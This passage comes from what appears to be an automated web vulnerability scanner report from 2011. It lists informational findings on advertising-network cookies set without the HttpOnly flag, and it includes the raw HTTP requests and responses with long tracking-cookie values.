csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=154dab7990adc1d6f3372c12^8^1304807875^2915161843; csi2=3204821.js^1^1304807875^1304807875; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C; put_1986=2724386019227846218; cd=false

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1; expires=Wed, 08-Jun-2011 14:00:12 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C519%2C3%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C; expires=Wed, 08-Jun-2011 14:00:12 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=2931142961646634775; expires=Fri, 08-Jul-2011 14:00:12 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
10.101. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=2931142961646634775 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; s=ff27bad6-6196-4fc3-ac7a-4d20dad87fe5; p=1304949602

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:09 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; expires=Wed, 08-May-2013 14:00:09 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
10.102. http://r.turn.com/r/bd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=18&uid=CAESEA4m3NbIVFSubIriNyJB6xg&cver=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwSKXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; uid=2931142961646634775; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15104%7C15104%7C15104%7C15104%7C15085%7C15104%7C15104%7C15082%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7Cundefined%7C15104%7Cundefined%7C15097%7C15093; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:15 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:15 GMT

GIF89a.............!.......,...........D..;
10.103. http://r.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwSKXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2